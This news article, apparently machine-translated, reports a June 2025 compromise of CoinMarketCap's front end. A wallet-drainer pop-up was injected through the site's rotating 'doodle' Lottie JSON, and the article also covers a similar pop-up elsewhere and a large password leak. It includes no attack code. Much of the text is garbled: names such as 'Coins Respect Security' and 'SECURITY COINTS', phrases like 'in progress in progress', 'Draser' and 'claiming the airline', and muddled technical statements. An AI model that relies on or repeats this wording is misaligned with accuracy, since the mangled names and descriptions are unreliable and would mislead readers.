Main to remember
- Coinmarketcap front has been compromised, displaying contextual window verification windows unauthorized to users.
- The violation has exploited an API Backend vulnerability linked to the Doodles functionality of the platform, which caused an in progress in progress.
Share this article
Coinmarketcap front was compromised on June 20, its web page displaying unauthorized pop-up messages asking visitors to check their cryptographic wallets. The malicious pop-up was first reported by several members of the cryptographic community.
The platform team confirmed the incident and warned users against the connection of their portfolios while they are investigating and working to solve the problem.
🚨 Safety alert
We know that a malicious pop-up encouraging users to “check the portfolio” appeared on our site.
⚠️ Do not connect your wallet.
Our team is actively investigating and works to solve the problem.
– Coinmarketcap (@coinmarketcap) June 20, 2025
The blockchain security service provider, Coins Respect Security, discovered that the CoinmarketCap Backend API offers useful handles that have been handled to inject malicious javascript via its rotary “doodles” function.
🚨 The CoinMarketCap Backend API serves JSON manipulated data which injects malicious javascript via the functionality of rotary “doodles”. Not all users see it, because the doodle displayed varies by visit. The injected portfolio drainer always takes care of if you visit / scribbles / pic.twitter.com/13o9ab7jlw
– SECURITY COINTS (@coinspect) June 20, 2025
Yes, the CoinmarketCap Draser loaded from a “Doodle” JSON file. Lottie is an animation file format based on JSON which allows designers to easily ship animations on any platform. We investigate this injection vector and other websites and the DAPPs must consider it.
– SECURITY COINTS (@coinspect) June 20, 2025
Also today, the cryptographic briefing has noticed signs of a similar security incident on another popular cryptography website.
The web page displayed a pop-up affirming an “exclusive” opportunity, which was distinct from the CoinmarketCap incident, but also prompted visitors to connect their portfolios by claiming the airline.
The cryptographic briefing could not confirm whether the site front-end was compromised, since suspicious behavior seemed only to last five minutes. The site quickly returned to normal and the pop-up was no longer visible.
The violation follows a cybersecurity report of Cybernews revealing 16 billion passwords exposed in one of the largest data violations in history, affecting access to large platforms, including Facebook, Google and Apple.
Experts recommend that users update passwords for all main accounts, especially those connected to sensitive services such as work platforms. Users are strongly advised to use a password manager to generate solid and unique passwords for each account.
Additional security measures, including activation of two -factors (2FA) and closely monitoring authentication, must also be taken into account.
Share this article
